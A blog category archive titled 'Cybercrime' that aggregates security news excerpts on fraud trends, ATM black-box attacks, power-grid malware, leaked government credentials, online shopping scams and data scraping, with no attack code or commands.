Category Archives: Cybercrime

Insight into the growing problem of highly sophisticated fraud

Sophisticated fraud campaigns are beginning to outwit machine learning solutions especially the ones that only detect known fraud patterns based on historic loss experience, according to DataVisor. The median lifetime of IP fraud signals is only 3.5 days As bad actors begin using modern technologies (even machine learning) in their attacks, enterprises must bolster detection efforts with a complete solution that can also detect new and emerging fraud patterns and detect them early, or risk … More

The post Insight into the growing problem of highly sophisticated fraud appeared first on Help Net Security.

Mobile Menace Monday: Is Fuchsia OS the end of Android?

It’s no secret that every year Google announces a new Android version. This time though, recent Google documents state that the next major Android version will be Android Q and not Android 9.1 Pie.

In parallel, Google is also developing an operating system called Fuchsia that’s supposedly going to replace Android in the near future. People were expecting to see a statement from Google about Fuchsia, or Andromeda (its previous codename), back in October 2017. But that never happened. Instead, we get to speculate for another year about whether or not it’s here to replace Android, or is simply a playground for developers. Here’s what we know so far.

A brief history of Google Fuchsia

Fuchsia is a capability-based operating system with user interface, and it has the ability to scale up to larger devices like laptops and computers. Also, it can support ARM, MIPS, and x86 processors.

It first popped up on GitHub in August 2016 with zero fanfare or explanation from Google. Unlike Android and Chrome OS, Google Fuchsia is not based on Linux, but rather Google’s own new microkernel.

In May 2017, an experimental OS leaked. However, it calling it an “OS” might be a misnomer. Basically, its system UI was up and running on top of Android and functioning like an app, but nothing else worked. Later, one of the developers working on the project teased that this was not just a dumping ground but a real project. This led to speculation that Google had larger plans for it.

Not long after, at the beginning of 2018, Google released news that the Fuchsia team picked the Chrome OS-powered Google Pixelbook as a supported device. A couple of curious users rushed out to test this claim. They confirmed that they were able to run Fuchsia on these Google Pixelbooks. This was one more big step forward. Since then, we’ve heard nothing more. However, we do know the components of Fuchsia, and they look promising.

The Fuchsia layer cake

Let’s take a closer look under the hood of this potential future Google OS. There are four distinct layers that hold the whole operating system together. Google uses a layer cake model when describing the organization of Fuchsia code, and we will not deviate from this scheme. So, let’s talk about each layer separately and in detail.

Zircon

It all starts with Zircon(formerly Magenta), the Fuchsia Operating System’s new microkernel, which is based on LK (Little Kernel), a small operating system intended for embedded devices. Zircon operates as a foundation on which the Fuchsia house foundation is built, and it primarily handles access to hardware and communication between software.

Garnet

The next layer, which sits atop Zircon, is called Garnet. Garnet consists of services needed for the OS, such as its network and graphics, together with the package manager and device drivers. Some of them worth mentioning here: Escher, a Vulkan-based graphics renderer with specific support for Volumetric soft shadows; Amber, Fuchsia’s update system; and Xi Editor,  modern editor with a backend written in Rust.

Peridot

The next layer up, Peridot, mostly handles Fuchsia’s modular runtime app design for composition. What this means is almost everything that exists in Fuchsia, such as software and even system files, are in packages. And Fuchsia packages can be made up of smaller components instead of large, all-in-one programs. One of the major components of Peridot is Ledger. Ledger is a storage system for Fuchsia, and it provides and manages separate data stores for apps/components across devices, syncing everything through a cloud provider.

Topaz

Topaz is the top layer and the one you’ll mostly likely interact with. It’s similar to Android’s pre-installed (factory) applications like messaging, contacts, phone, camera, and music. The most important part is the introduction of Flutter support. Flutter is a software development kit allowing cross-platform development abilities for Fuchsia, Android, and iOS. Flutter produces apps based on Dart, an open-source, scalable programming language with robust libraries and runtimes for building web, server, and mobile apps. Due to the Flutter software development kit offering cross-platform opportunities, users are able to install parts of Fuchsia on Android devices.

In addition, Google already announced Flutter 1.0 is out. The first stable release of Google’s UI toolkit for creating native experiences for iOS and Android from a single codebase is available at https://flutter.io.

Final thoughts

Let’s sum it up. Here’s what we know so far:

  • Google Fuchsia is a new OS in development from Google, but is still a ways off from completion.
  • The OS is based on the Zirkon kernel, which makes it highly scalable and secure.
  • Flutter, a software development kit offering cross-platform opportunities, is already out.

Although Google said Fuchsia is just “one of many experimental open-source projects” at the company, we can already see a potential OS brewing that could replace Android. Microsoft once tried to create something similar with the code name Singularity, but they totally failed. That’s why there’s a big question mark if Fuchsia will actually replace Android and Chrome OS, or putter out like some of its predecessors.

Also, let’s remember that Android was hanging around for about five years before it launched in a real product. If Fuchsia follows a similar path, and everything goes well, maybe we can expect a consumer product sometime around 2020. Right now, it’s still a giant maybe. So if you’re feeling stressed about learning a new OS, there is still plenty of time to adjust—save the panicking for later in 2019.

The post Mobile Menace Monday: Is Fuchsia OS the end of Android? appeared first on Malwarebytes Labs.

Digital skills are critical for tackling the rising tide of cybercrime

The rising tide of cybercrime shows no sign of slowing. Whether it’s hacking, identity fraud or malware attacks, online criminals have proven themselves to be both relentless and ruthless. Targets have included public sector institutions, charities, even the UK’s National Health Service (NHS) was not spared. In this challenging climate, it is unsurprising that police forces are facing extreme pressure to protect victims and take meaningful action against the perpetrators, who are hard to track … More

The post Digital skills are critical for tackling the rising tide of cybercrime appeared first on Help Net Security.

Cybercrime gangs continue to innovate to hide their crimes

According to the APWG’s new Phishing Activity Trends Report, after spiking in the spring, phishing has been taking place at a steady pace — but phishers are using new techniques to carry out their attacks – and obfuscate their origins – to make the most of every phishing campaign. The total number of phish detected by APWG in Q3 2018 was 151,014. This was down from 233,040 in Q2 and 263,538 in Q1. There was … More

The post Cybercrime gangs continue to innovate to hide their crimes appeared first on Help Net Security.

Cyber Security Project Investment Proposal – DIA Needipedia – Fight Cybercrime and Cyber Jihad With Sensors – Grab Your Copy Today!

Dear blog readers, I decided to share with everyone a currently pending project investment proposal regarding the upcoming launch of a proprietary Technical Collection analysis platform with the project proposal draft available on request part of DIA's Needipedia Project Proposal Investment draft or eventually through the Smith Richardson Foundation. In case you're interested in working with me

McAfee Blogs: Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online

It was the last item on my list and Christmas was less than a week away. I was on the hunt for a white Northface winter coat my teenage daughter that she had duly ranked as the most-important-die-if-I-don’t-get-it item on her wishlist that year.

After fighting the crowds and scouring the stores to no avail, I went online, stressed and exhausted with my credit card in hand looking for a deal and a Christmas delivery guarantee.

Mistake #1: I was under pressure and cutting it way too close to Christmas.
Mistake #2: I was stressed and exhausted.
Mistake #3: I was adamant about getting the best deal.

Gimme a deal!

It turns out these mistakes created the perfect storm for a scam. I found a site with several name brand named coats available lower prices. I was thrilled to find the exact white coat and guaranteed delivery by Christmas. The cyber elves were working on my behalf for sure!

Only the coat never came and I was out $150.

In my haste and exhaustion, I overlooked a few key things about this “amazing” site that played into the scam. (I’ll won’t harp on the part about me calling customer service a dozen times, writing as many emails, and feeling incredible stupidity over my careless clicking)!

Stress = Digital Risk

I’m not alone in my holiday behaviors it seems. A recent McAfee survey, Stressed Holiday Online Shopping, reveals, unfortunately, that when it comes to online shopping, consumers are often more concerned about finding a deal online than they are with protecting their cybersecurity in the process. 

Here are the kinds of risks stressed consumers are willing to take to get a holiday deal online:

  • 53% think the financial stress of the holidays can lead to careless shopping online.
  • 56% said that they would use a website they were unfamiliar with if it meant they would save money.
  • 51% said they would purchase an item from an untrusted online retailer to get a good deal.
  • 31% would click on a link in an email to get a bargain, regardless of whether they were familiar with the sender.
  • When it comes to sharing personal information to get a good deal: 39% said they would risk sharing their email address, 25% would wager their phone number, and 16% percent would provide their home address.

3 Tips to Safer Online Shopping:

  • Connect with caution. Using public Wi-Fi might seem like a good idea at the moment, but you could be exposing your personal information or credit card details to cybercriminals eavesdropping on the unsecured network. If public Wi-Fi must be used to conduct transactions, use a virtual private network (VPN) to help ensure a secure connection.
  • Slow down and think before you click. Don’t be like me exhausted and desperate while shopping online — think before you click! Cybercriminal love to target victims by using phishing emails disguised as holiday savings or shipping notification, to lure consumers into clicking links that could lead to malware, or a phony website designed to steal personal information. Check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use comprehensive security protection that can help protect devices against malware, phishing attacks, and other threats. Protect your personal information by using a home solution that keeps your identity and financial information secure.
  • Take a nap, stay aware. This may not seem like an important cybersecurity move, but during the holiday rush, stress and exhaustion can wear you down and contribute to poor decision-making online. Outsmarting the cybercrooks means awareness and staying ahead of the threats.

I learned the hard way that holiday stress and shopping do not mix and can easily compromise my online security. I lost $150 that day and I put my credit card information (promptly changed) firmly into a crook’s hands. I hope by reading this, I can help you save far more than that.

Here’s wishing you and your family the Happiest of Holidays! May all your online shopping be merry, bright, and secure from all those pesky digital Grinches!

The post Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online appeared first on McAfee Blogs.



McAfee Blogs

Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online

It was the last item on my list and Christmas was less than a week away. I was on the hunt for a white Northface winter coat my teenage daughter that she had duly ranked as the most-important-die-if-I-don’t-get-it item on her wishlist that year.

After fighting the crowds and scouring the stores to no avail, I went online, stressed and exhausted with my credit card in hand looking for a deal and a Christmas delivery guarantee.

Mistake #1: I was under pressure and cutting it way too close to Christmas.
Mistake #2: I was stressed and exhausted.
Mistake #3: I was adamant about getting the best deal.

Gimme a deal!

It turns out these mistakes created the perfect storm for a scam. I found a site with several name brand named coats available lower prices. I was thrilled to find the exact white coat and guaranteed delivery by Christmas. The cyber elves were working on my behalf for sure!

Only the coat never came and I was out $150.

In my haste and exhaustion, I overlooked a few key things about this “amazing” site that played into the scam. (I’ll won’t harp on the part about me calling customer service a dozen times, writing as many emails, and feeling incredible stupidity over my careless clicking)!

Stress = Digital Risk

I’m not alone in my holiday behaviors it seems. A recent McAfee survey, Stressed Holiday Online Shopping, reveals, unfortunately, that when it comes to online shopping, consumers are often more concerned about finding a deal online than they are with protecting their cybersecurity in the process. 

Here are the kinds of risks stressed consumers are willing to take to get a holiday deal online:

  • 53% think the financial stress of the holidays can lead to careless shopping online.
  • 56% said that they would use a website they were unfamiliar with if it meant they would save money.
  • 51% said they would purchase an item from an untrusted online retailer to get a good deal.
  • 31% would click on a link in an email to get a bargain, regardless of whether they were familiar with the sender.
  • When it comes to sharing personal information to get a good deal: 39% said they would risk sharing their email address, 25% would wager their phone number, and 16% percent would provide their home address.

3 Tips to Safer Online Shopping:

  • Connect with caution. Using public Wi-Fi might seem like a good idea at the moment, but you could be exposing your personal information or credit card details to cybercriminals eavesdropping on the unsecured network. If public Wi-Fi must be used to conduct transactions, use a virtual private network (VPN) to help ensure a secure connection.
  • Slow down and think before you click. Don’t be like me exhausted and desperate while shopping online — think before you click! Cybercriminal love to target victims by using phishing emails disguised as holiday savings or shipping notification, to lure consumers into clicking links that could lead to malware, or a phony website designed to steal personal information. Check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use comprehensive security protection that can help protect devices against malware, phishing attacks, and other threats. Protect your personal information by using a home solution that keeps your identity and financial information secure.
  • Take a nap, stay aware. This may not seem like an important cybersecurity move, but during the holiday rush, stress and exhaustion can wear you down and contribute to poor decision-making online. Outsmarting the cybercrooks means awareness and staying ahead of the threats.

I learned the hard way that holiday stress and shopping do not mix and can easily compromise my online security. I lost $150 that day and I put my credit card information (promptly changed) firmly into a crook’s hands. I hope by reading this, I can help you save far more than that.

Here’s wishing you and your family the Happiest of Holidays! May all your online shopping be merry, bright, and secure from all those pesky digital Grinches!

The post Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online appeared first on McAfee Blogs.

KoffeyMaker Toolkit Used in Black Box ATM Attacks Against Eastern European Banks

In 2017 and 2018, threat actors utilized a toolkit called KoffeyMaker in multiple black box ATM attacks targeting Eastern European financial institutions.

When Kaspersky Lab investigated KoffeyMaker in connection with the attacks, researchers discovered that the devices in the campaign consisted of Windows laptops containing ATM dispenser drivers and a patched KDIAG tool.

Those behind the attacks secretly opened an ATM at each targeted bank, connected the device to the cash dispenser, closed the ATM and walked away with the device still inside the machine.

Returning at a later time, attackers leveraged a USB GPRS modem to gain remote access to the device, run the KDIAG tool and execute a command for the ATM to dispense bank notes before retrieving the laptop — all while another attacker collected the money. Together, they then made their escape with potentially tens of thousands of dollars in tow.

ATM Attacks Aren’t New to Europe

Attacks like those involving KoffeyMaker aren’t new. As reported by Information Security Media Group (ISMG), the number of jackpotting attacks against ATMs in European countries grew by 231 percent in 2017. Of those attacks, the majority were black box campaigns. One of these cases involved the use of Cutlet Maker, ATM malware detected by Kaspersky Lab that is not unlike KoffeyMaker in its design.

Fortunately, law enforcement had some success in arresting criminals during that same span of time. In one of the most noteworthy takedowns, several EU member states and Norway, supported by Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT), arrested 27 individuals responsible for conducting black box ATM attacks across Europe.

How to Defend Against Tools Like KoffeyMaker

According to Kaspersky Lab, the only way for banks to defend against black box attacks is to use hardware encryption between an ATM’s computer and dispenser. Organizations should also implement a stronger data security strategy. This plan should include the use of encryption to protect sensitive cloud-based data.

Sources: Kaspersky Lab, ISMG, Kaspersky Lab (1), EC3

The post KoffeyMaker Toolkit Used in Black Box ATM Attacks Against Eastern European Banks appeared first on Security Intelligence.

SecurityWeek RSS Feed: AP Exclusive: Iran Hackers Hunt Nuke Workers, US Officials

LONDON — As U.S. President Donald Trump re-imposed harsh economic sanctions on Iran last month, hackers scrambled to break into personal emails of American officials tasked with enforcing them, The Associated Press has found — another sign of how deeply cyberespionage is embedded into the fabric of U.S.-Iranian relations.

read more



SecurityWeek RSS Feed

Compromising vital infrastructure: the power grid

Where were you when the lights went out? That line became famous after the 1977 blackout in New York City. This power outage was caused by lightning and lasted for up to two days, depending on which part of New York you lived in. While in this case the power grid failure was a freak incident due to faulty backup equipment, it is still famous for the havoc it wreaked throughout the city—including looting and arson—during a time when national morale was already low.

Now imagine something similar happening today. Would it result in the same criminal chaos? My guess is it would depend on the circumstances and how much time it takes to restore power. Let’s hope we never find out.

Power grid hardware

The underlying hardware of the power grid has gone through a lot of improvements since 1977. And so have backup systems and procedures.

In many countries, a power interruption that lasts longer than a given threshold gives the consumer the right to claim damages from the power company. These damages are to be paid by the electricity distributor. The amount of the customer compensation and the threshold can be vary from one country to another, but you can usually look them up on the website of your provider.

This is not to say that it’s impossible to do physical damage if an attacker is determined enough, as the 2013 sniper attack on a California energy grid substation demonstrated.

Recent regulations and improvements have made it rare to experience power outages of more than a few hours in the western world—unless there are special circumstances, such as natural disasters. Tornadoes, hurricanes, earthquakes, erupting volcanoes, flooding, and wildfires can cause power outages, which makes dealing with those disasters even more difficult. Any other power outages are usually restored quickly or covered by backup systems.

Malware

We are aware of several malware variants that are used against power supplies, and some of them can be held responsible for major power outages around the globe.

Stuxnet is a worm designed to spread through Windows systems and go after certain programmable controllers by seeking out the software related to these controllers. Stuxnet is believed to be specifically designed to destroy the Iranian nuclear program, but it can also be used to bring down power plants.

A group of hackers dubbed Sandworm and suspected to be based in Russia shut down the Ukrainian power grid in December 2015 using a malware called BlackEnergy. The malware opened a backdoor that allowed the attackers to control infected machines to a level where they were able to cross over into the operational network. Once there, they started to flip switches, disabling IT infrastructure and deleting files. Earlier in 2014, the US government reported that hackers had planted BlackEnergy on the networks of American power and water utilities, but nothing came of it.

If any countermeasures were taken in the Ukraine, they turned out to be insufficient or at least unable to withstand CrashOverRide. CrashOverRide, aka Industroyer, is an adaptable malware that can automate and orchestrate mass power outages. The power grid–sabotaging malware was likely the one they used in the December 2016 cyberattack against Ukrainian electric utility Ukrenergo. The CrashOverRide malware can control legacy electricity substations’ switches and circuit breakers, allowing an attacker to simply turn off power distribution, leading to cascading failures and causing more severe damage to equipment.

Dragonfly, aka Energetic Bear, is a malware campaign that uses a variety of infection vectors in an effort to gain access to a victim’s network, including malicious emails, watering hole attacks, and Trojanized software. Part of this campaign was a malicious email disguised as an invitation to a New Year’s Eve party to targets in the energy sector in December 2015.

Sandworm malware, discovered in 2014, uses a vulnerability to launch external files from a malicious Powerpoint file. In a Sandworm attack, the malicious Powerpoint file pulls in two files from a remote server that combine to deliver the malware payload. Sandworm has been used in targeted attacks against NATO, the European Union, and companies in the telecommunications and energy sectors.

Backup systems

It may seem obvious to point out that critical systems like hospitals should have independent emergency power backup systems. And most of them do. But are they tested regularly for functionality? Do they have enough supplies to last during a prolonged power outage? Is there an option to turn them on manually if they fail to kick in automatically? And is someone available on premise who knows how to do this?

Emergency power systems come in many shapes and sizes. Standby generators are probably the most well-known, and they rely on some kind of fuel to provide the emergency power. Batteries, for example, use stored power and release this power when it’s needed. But batteries are generally only a solution for hours rather than days, and they tend to lose some power even when they are not in use. It is imperative to find a backup solution that is robust enough to meet your needs in a worst-case scenario.

control room of a nuclear power plant

Energy sources

Theoretically, there are other ways to frustrate the power grid. For example, by cutting off the resources we use to run the power plant, such as coal, water, wind, solar, nuclear, and natural gas. This is a good reason to use a wide variety of resources, and another excellent reason to use renewable energy. There is also good reason why OPEC has a lot of influence in the world of today.

To show that hacking into power supplies is not entirely theoretical, we want to mention that Iranian hackers infiltrated the control system of a small dam less than 20 miles from New York City in 2013. Unfortunately, many power plants are still accessible from the Internet in unnecessary ways that endanger their cybersecurity.

Countermeasures

Criminals have tools at their disposal with the capability to cause serious damage to the power grid. Therefore, the power industry must take precautions and upgrade cybersecurity to keep their systems safe. And they should do more than just abide by the minimum-security standard. Power grid exploitation companies and their suppliers should have themselves tested on their ability to withstand cyberattacks on a regular basis.

This is especially true for nuclear power plants, where a loss of control can have more catastrophic consequences than just the loss of power output. Since 9/11, every company operating nuclear power plants has had an NRC-approved cybersecurity program in place, but cybersecurity was not such an issue when these plants were designed.

Besides cybersecurity, there are physical measures a government could enforce to improve the stability of a stressed power grid. As Joshua Pearce, a professor of electrical and computer engineering at Michigan Technological University, put it:

If we want to have a secure grid and go full throttle on renewable energy, what it means is we need to break up the grid into a bunch of microgrids that still act together as a full grid, so that we still have all the benefits that we have today with our giant centralized grid while still having the security.

In an attack, such a microgrid could be taken out without having an ill effect on all the other microgrids—which would make a successful attack less disastrous.

It would also stand to reason to take heed of the advice of Energy Secretary Rick Perry, who told lawmakers at an appropriations hearing that cyberattacks are literally happening hundreds of thousands of times a day. He warned that the Department of Energy needs an office of cybersecurity and emergency response in order to be prepared for threats like this in the future. And looking at what’s already taken place, plus what is vulnerable to attack: We have to agree.

The post Compromising vital infrastructure: the power grid appeared first on Malwarebytes Labs.

Hacking democracy efforts continue with upticks in malware deployments

Comodo Cybersecurity released its Global Threat Report 2018 Q3, offering insights from Comodo Threat Research Lab experts into key cyberthreat trends and the impact of malware on elections and other geopolitical events. Hacking democracy and malware in conflict zones The Comodo Q3 report also reveals disturbing upticks in malware deployment leading up to major national elections. Comodo Cybersecurity researchers document the impact of malware on elections in Russia, Turkey, Mali, Sierra Leone, Azerbaijan and Columbia. … More

The post Hacking democracy efforts continue with upticks in malware deployments appeared first on Help Net Security.

Criminals, Not State Actors, Target Russian Oil Company in 3-Year Cyber Attack

Security researchers have uncovered a three-year cyber attack on a Russian oil company that appeared at first glance to be state-sponsored, but later was found to be the work of cyber criminals seeking financial gain. The discovery is a cautionary tale for security experts not to be too rash when  when drawing conclusions about high-profile cyber...

Read the whole entry... »

Related Stories

6.8% of the top 100,000 websites still accept old, insecure SSL versions

Mac-based malware has appeared on the list of the top ten most common types of malware for the first time in WatchGuard’s quarterly Internet security report. The Mac scareware appeared in sixth place in WatchGuard’s latest Q3 2018 report and is primarily delivered by email to trick victims into installing fake cleaning software. Researchers also found that 6.8 percent of the world’s top 100,000 websites still accept old, insecure versions of the SSL encryption protocol, … More

The post 6.8% of the top 100,000 websites still accept old, insecure SSL versions appeared first on Help Net Security.

Android Trojan steals money from victims’ PayPal account

ESET researchers have unearthed a new Android Trojan that tricks users into logging into PayPal, then takes over and mimics the user’s clicks to send money to the attacker’s PayPal address. The heist won’t go unnoticed by the victim if they are looking at the phone screen, but they will also be unable to do anything to stop the transaction from being executed as it all happens in a matter of seconds. The only thing … More

The post Android Trojan steals money from victims’ PayPal account appeared first on Help Net Security.

November 2018: Most wanted malware exposed

Check Point has published its latest Global Threat Index for November 2018. The index reveals that the Emotet botnet has entered the Index’s top 10 ranking after researchers saw it spread through several campaigns, including a Thanksgiving-themed campaign. This involved sending malspam emails in the guise of Thanksgiving cards, containing email subjects such as happy “Thanksgiving day wishes”, “Thanksgiving wishes” and “the Thanksgiving day congratulation!” These emails contained malicious attachments, often with file names related … More

The post November 2018: Most wanted malware exposed appeared first on Help Net Security.

Security Affairs: Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries

Group-IB, an international company that specializes in preventing cyberattacks, has detected more than 40 000 compromised user credentials of online government services in 30 countries around the world.

Most of the victims were in Italy (52%), Saudi Arabia (22%) and Portugal (5%). Users’ data might have been sold on underground hacker forums or used in targeted attacks to steal money or exfiltrate sensitive information. CERT-GIB (Group-IB’s Computer Emergency Response Team) upon identification of this information promptly warned CERTs of the affected countries about the threat so that risks could be mitigated.

Group-IB Threat Intelligence has detected government websites’ user accounts compromised by cyber criminals in 30 countries. Official government portals including Poland (gov.pl), Romania (gov.ro),Switzerland (admin.ch), the websites of Italian Ministry of Defense (difesa.it), Israel Defense Forces(idf.il), the Government of Bulgaria (government.bg), the Ministry of Finance of Georgia (mof.ge),Norwegian Directorate of Immigration (udi.no), the Ministries of Foreign Affairs of Romania and Italyand many other government agencies were affected by the data compromise.

Government employees, military and civilian citizens who had accounts on official government portals of France (gouv.fr), Hungary (gov.hu) and Croatia (gov.hr) became victims of this data compromise. In total Group-IB Threat Intelligence system has detected more than 40 000 comprised user accounts of the largest government websites in 30 countries across the world over the past year and a half – Italy (52%), Saudi Arabia (22%) and Portugal (5%) were affected most.

According to Group-IB experts, cyber criminals stole user accounts’ data using special spyware – form grabbers, keyloggers, such as Pony Formgrabber, AZORult and Qbot (Qakbot). Phishing emails were sent to personal and corporate email accounts. The infection came from a malware included as an email attachment disguised as a legitimate file or archive. Once opened, it ran a Trojan aimed at stealing personal information. For instance, Pony Formgrabber retrieves login credentials from configuration files, databases, secret storages of more than 70 programs on the victim’s computer and then sends stolen information to cyber criminals’ C&C server. Another Trojan-stealer — AZORult, aside from stealing passwords from popular browsers, is capable of stealing crypto wallets data. Qbot worm gathers login credentials through use of keylogger, steals cookie files and certificates, active internet sessions, and forwards users to fake websites.

The stolen user accounts data is usually sorted by subject (banks’ client data, government portals user accounts, combo lists – email & password) and goes for sale on underground hacker forums. It is worth noting that government websites’ user accounts are less common on the forums. Cyber criminals and state-sponsored APT-groups, specialized in sabotage and espionage, are among those who can buy this information. Knowing the credentials of government websites’ users, hackers can not only obtain classified information from these websites, but also infiltrate government networks. Even one compromised government employee’s account can lead to the theft of commercial or state secrets.

“The scale and simplicity of government employees’ data compromise shows that users, due to their carelessness and lack of reliable cyber defense, fall victims to hackers, – commented Alexandr Kalinin,head of Group-IB’s Computer Emergency Response Team (CERT-GIB). – Malware used by cyber criminals to compromise user accounts continue to evolve. For better protection against this type of attacks, it is indeed important to not only use most up-to-date anti-APT solutions, but also to know the context of the attacks:  when, where and how exactly your data was compromised”.

Regularly updated Group-IB Threat Intelligence system allows to get actionable information about data leaks, compromised accounts, information about malware, infected IPs, existing vulnerabilities across the world. These unique indicators allow to prepare for cyberattacks in advance. Another important factor is international cooperation. To prevent further incidents GIB-CERT experts contacted official CERTs in more than 30 countries and notified local incident response teams about data compromise.

“Threat Intelligence data exchange between official government CERTs is crucial for global fight against cybercrime, — highlights Alexandr Kalinin, — it is important for us to cooperate with other CERTs, which allows to provide rapid incident response and gather more information about hackers’ evolving tactics and tools, indicators of compromise, and about most urgent threats. Cybercrime has no borders and affects private and public companies and ordinary citizens. International data exchange on current threats is a backbone of global stability”. 

About the author: Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection. 

Pierluigi Paganini

(Security Affairs – leaked credentials, cybercrime)

The post Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries appeared first on Security Affairs.



Security Affairs

Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries

Group-IB, an international company that specializes in preventing cyberattacks, has detected more than 40 000 compromised user credentials of online government services in 30 countries around the world.

Most of the victims were in Italy (52%), Saudi Arabia (22%) and Portugal (5%). Users’ data might have been sold on underground hacker forums or used in targeted attacks to steal money or exfiltrate sensitive information. CERT-GIB (Group-IB’s Computer Emergency Response Team) upon identification of this information promptly warned CERTs of the affected countries about the threat so that risks could be mitigated.

Group-IB Threat Intelligence has detected government websites’ user accounts compromised by cyber criminals in 30 countries. Official government portals including Poland (gov.pl), Romania (gov.ro),Switzerland (admin.ch), the websites of Italian Ministry of Defense (difesa.it), Israel Defense Forces(idf.il), the Government of Bulgaria (government.bg), the Ministry of Finance of Georgia (mof.ge),Norwegian Directorate of Immigration (udi.no), the Ministries of Foreign Affairs of Romania and Italyand many other government agencies were affected by the data compromise.

Government employees, military and civilian citizens who had accounts on official government portals of France (gouv.fr), Hungary (gov.hu) and Croatia (gov.hr) became victims of this data compromise. In total Group-IB Threat Intelligence system has detected more than 40 000 comprised user accounts of the largest government websites in 30 countries across the world over the past year and a half – Italy (52%), Saudi Arabia (22%) and Portugal (5%) were affected most.

According to Group-IB experts, cyber criminals stole user accounts’ data using special spyware – form grabbers, keyloggers, such as Pony Formgrabber, AZORult and Qbot (Qakbot). Phishing emails were sent to personal and corporate email accounts. The infection came from a malware included as an email attachment disguised as a legitimate file or archive. Once opened, it ran a Trojan aimed at stealing personal information. For instance, Pony Formgrabber retrieves login credentials from configuration files, databases, secret storages of more than 70 programs on the victim’s computer and then sends stolen information to cyber criminals’ C&C server. Another Trojan-stealer — AZORult, aside from stealing passwords from popular browsers, is capable of stealing crypto wallets data. Qbot worm gathers login credentials through use of keylogger, steals cookie files and certificates, active internet sessions, and forwards users to fake websites.

The stolen user accounts data is usually sorted by subject (banks’ client data, government portals user accounts, combo lists – email & password) and goes for sale on underground hacker forums. It is worth noting that government websites’ user accounts are less common on the forums. Cyber criminals and state-sponsored APT-groups, specialized in sabotage and espionage, are among those who can buy this information. Knowing the credentials of government websites’ users, hackers can not only obtain classified information from these websites, but also infiltrate government networks. Even one compromised government employee’s account can lead to the theft of commercial or state secrets.

“The scale and simplicity of government employees’ data compromise shows that users, due to their carelessness and lack of reliable cyber defense, fall victims to hackers, – commented Alexandr Kalinin,head of Group-IB’s Computer Emergency Response Team (CERT-GIB). – Malware used by cyber criminals to compromise user accounts continue to evolve. For better protection against this type of attacks, it is indeed important to not only use most up-to-date anti-APT solutions, but also to know the context of the attacks:  when, where and how exactly your data was compromised”.

Regularly updated Group-IB Threat Intelligence system allows to get actionable information about data leaks, compromised accounts, information about malware, infected IPs, existing vulnerabilities across the world. These unique indicators allow to prepare for cyberattacks in advance. Another important factor is international cooperation. To prevent further incidents GIB-CERT experts contacted official CERTs in more than 30 countries and notified local incident response teams about data compromise.

“Threat Intelligence data exchange between official government CERTs is crucial for global fight against cybercrime, — highlights Alexandr Kalinin, — it is important for us to cooperate with other CERTs, which allows to provide rapid incident response and gather more information about hackers’ evolving tactics and tools, indicators of compromise, and about most urgent threats. Cybercrime has no borders and affects private and public companies and ordinary citizens. International data exchange on current threats is a backbone of global stability”. 

About the author: Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection. 

Pierluigi Paganini

(Security Affairs – leaked credentials, cybercrime)

The post Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries appeared first on Security Affairs.

Data scraping treasure trove found in the wild

We bring word of yet more data exposure, in the form of “nonsensitive” data scraping to the tune of 66m records across 3 large databases. The information was apparently scraped from various sources and left to gather dust, for anyone lucky enough to stumble upon it.

What is data scraping?

The gathering of information from websites either by manual means, which isn’t time optimal, or by automated processes such as dedicated programs or bots. Often, this data scraping is for nefarious purposes and can be used for marketing or simply threatening behaviour. It also typically relies on the person being scraped to have provided much of the grabbable data upfront. It’s frowned upon, but it’s often unclear where things stand legally.

Scrape all the things

Three large databases were found by security researchers, containing a combined tally of 66,147,856 unique records. At least one instance was exposed due to a lack of authentication. The records are very business-centric, with one (for example) containing full name, email, listed location, employment history, and skills. This sounds very much like the information you see on a public facing Linkedin profile. Indeed, many people have said they received breach notifications to their Linkedin specific mail, and there’s some mention of Github too.

Elsewhere, some 22 million records were found on the second server. This related to job search aggregation data, and this included IP, name, email, and potential job locations. Number 3 sang to the tune of 48 million records, and also sounds like a generic business-centric dump. Name, phone, employer, and so on.

Is the threat serious?

The information collected isn’t exactly a red hot dump of personal information, but it’s certainly useful for phishing attempts. It could also prove useful to anyone wanting a ready made marketing list. The big problem is that even if the ones doing the data scraping had no harmful intentions, that may not apply to anybody finding the treasure trove.

Given how this information was stumbled upon in the first place, there’s no real way to know how many bad actors got their hands on it first.

How can I reduce the scraping risk?

Well, that’s a good question. Given that the data was (mostly) freely given online in terms of the Linkedin profile information, it’s all about personal choice. Take a look at your Linkedin right now. Are you happy with what’s on display? Have you hidden any of it? Perhaps it’s a good idea to remove older roles, or jobs of a sensitive nature. Maybe that phone number doesn’t need to be so prominent. How about location, does it have to be so precise? Or would a broader area suffice?

Unfortunately, many people don’t consider the information they place online to be harmful, until it suddenly is. By the time it’s been scraped, plundered, and jammed into a larger database, it’s already too late to do anything about it.

The only real solution is to control every last aspect of what you’re happy to place in front of everybody else, which for most people involves having to dredge up a list of sites and accounts then start stripping things out. That’s fine; it’s never too late to start pulling things offline that don’t need to be there.

Next steps for anyone affected?

Given the very prominent business angle to this one, it’d be wise to consider who may look to take advantage of it. Alongside the previously mentioned phishers, this is the kind of thing someone could use alongside the offer of fake jobs. If you want to become a money mule, this could definitely be the “perfect” lead in!

A common destination for business-centric grab bags such as this one are unremarkable job search sites. Be on the look out for a flood of poor quality job offer spam. Be especially wary if they come bearing gifts of paid membership, as nobody should pay someone grabbing your data free of charge then using it to spam them with nonsense.

Ah yes, spam.

Scraped email lists will inevitably be harvested, readjust quality filters if needed. The good news is, most email offerings do a pretty good job of keeping your mailbox clean.

Almost all of us will end up in a data dump at some point. Whether scraped or hacked, being cautious around strange phonecalls and peculiar emails will go a long way towards minimising any further potential harm.

The post Data scraping treasure trove found in the wild appeared first on Malwarebytes Labs.

Security Affairs: Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS

